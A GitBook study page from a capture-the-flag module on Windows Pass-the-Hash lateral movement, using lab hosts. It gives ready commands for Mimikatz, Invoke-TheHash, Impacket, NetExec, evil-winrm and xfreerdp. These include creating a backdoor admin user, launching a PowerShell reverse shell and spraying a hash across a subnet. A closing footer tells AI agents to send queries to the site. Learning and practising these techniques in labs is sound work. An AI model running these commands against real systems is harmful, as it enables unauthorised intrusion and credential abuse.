> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-lateral-movement/pass-the-hash-pth.md).

# Pass the Hash(PtH)

## Pass the Hash (PtH)

### Overview

Pass the Hash is a lateral movement technique where you authenticate using an NTLM hash directly — no plaintext password needed. NTLM hashes are static per session until the password changes, and Windows doesn't salt them, so the hash itself is the credential.

**Where hashes come from:**

* SAM database dump from a compromised host
* NTDS.dit from a Domain Controller
* LSASS memory dump

***

### How NTLM Authentication Works

```
Client → sends username
Server → sends challenge (random value)
Client → encrypts challenge with NTLM hash → sends response
Server → verifies response
```

The hash never changes between sessions — so replay it directly without cracking.

***

### From Windows

#### Mimikatz — sekurlsa::pth

Opens a new process (cmd.exe by default) running under the target user's context using their hash.

```cmd
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit
```

| Parameter         | Purpose                                  |
| ----------------- | ---------------------------------------- |
| `/user`           | Username to impersonate                  |
| `/rc4` or `/NTLM` | NTLM hash                                |
| `/domain`         | Domain name (use `.` for local accounts) |
| `/run`            | Program to launch (default: `cmd.exe`)   |

A new cmd window opens — all commands run as `julio`.

***

#### Invoke-TheHash — SMB / WMI Execution

PowerShell tool. No local admin required on the client side — but the target user needs admin rights on the remote machine.

**Import module:**

```powershell
cd C:\tools\Invoke-TheHash\
Import-Module .\Invoke-TheHash.psd1
```

**SMB execution — create backdoor user:**

```powershell
Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose
```

**WMI execution — reverse shell:**

```powershell
# Start listener first
.\nc.exe -lvnp 8001

# Generate Base64 PowerShell payload at revshells.com
# PowerShell #3 (Base64), IP: 172.16.1.5, Port: 8001

Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e <base64_payload>"
```

| Method           | Use case                                            |
| ---------------- | --------------------------------------------------- |
| `Invoke-SMBExec` | Command execution via SMB (Service Control Manager) |
| `Invoke-WMIExec` | Command execution via WMI (stealthier)              |

***

### From Linux

#### Impacket — psexec

Uploads a binary to ADMIN$, creates a service, executes it. Gives SYSTEM shell.

```bash
impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
```

> Format: `-hashes LM:NTLM` — if no LM hash, use `:NTLM` (colon prefix)

**Other Impacket PtH tools:**

```bash
impacket-wmiexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
impacket-smbexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
impacket-atexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
```

***

#### NetExec — Spray Across Subnet

Useful for checking hash reuse across multiple hosts. `Pwn3d!` = local admin on that target.

**Spray across subnet:**

```bash
netexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453
```

**Local accounts only (`--local-auth`):**

```bash
netexec smb 172.16.1.0/24 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453 --local-auth
```

**Execute command on target:**

```bash
netexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami
```

| Flag           | Meaning                                        |
| -------------- | ---------------------------------------------- |
| `-H`           | NTLM hash                                      |
| `-d .`         | Local account (dot = no domain)                |
| `--local-auth` | Try only local accounts, avoids domain lockout |
| `-x`           | Execute command                                |

***

#### evil-winrm — WinRM Access

Use when SMB is blocked or no admin share access. Requires WinRM (port 5985) open on target.

```bash
evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453
```

**Domain account:**

```bash
evil-winrm -i 10.129.201.126 -u administrator@inlanefreight.htb -H 30B3783CE2ABF1AF70F77D0660CF3453
```

***

#### xfreerdp — RDP GUI Access

Requires **Restricted Admin Mode** enabled on target (disabled by default).

**Enable on target (requires existing access):**

```cmd
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
```

**Connect:**

```bash
xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B
```

***

### UAC Restriction — Local Accounts

UAC blocks PtH for local accounts by default. Only the **built-in Administrator (RID-500)** can do remote PtH unless the following registry key is set:

```
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy
```

| Value         | Effect                                       |
| ------------- | -------------------------------------------- |
| `0` (default) | Only RID-500 can do remote admin via PtH     |
| `1`           | All local admins can do remote admin via PtH |

> Domain accounts with admin rights are **not affected** by this restriction.

***

### Tool Selection Guide

| Scenario                            | Tool                        |
| ----------------------------------- | --------------------------- |
| On Windows, need a shell            | Mimikatz `sekurlsa::pth`    |
| On Windows, execute remote command  | Invoke-TheHash (SMB or WMI) |
| On Linux, need interactive shell    | `impacket-psexec`           |
| On Linux, spray hash across network | `netexec smb --local-auth`  |
| SMB blocked, WinRM open             | `evil-winrm`                |
| Need GUI access                     | `xfreerdp /pth`             |

***

### Attack Flow

```
Obtain NTLM hash (SAM / NTDS / LSASS)
        │
        ├── Windows foothold
        │       ├── Mimikatz sekurlsa::pth → spawns cmd as target user
        │       └── Invoke-TheHash → remote SMB/WMI command execution
        │
        └── Linux foothold
                ├── impacket-psexec     → SYSTEM shell via SMB
                ├── netexec --local-auth → spray, find reuse
                ├── evil-winrm          → PS shell via WinRM
                └── xfreerdp /pth       → GUI via RDP
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-lateral-movement/pass-the-hash-pth.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
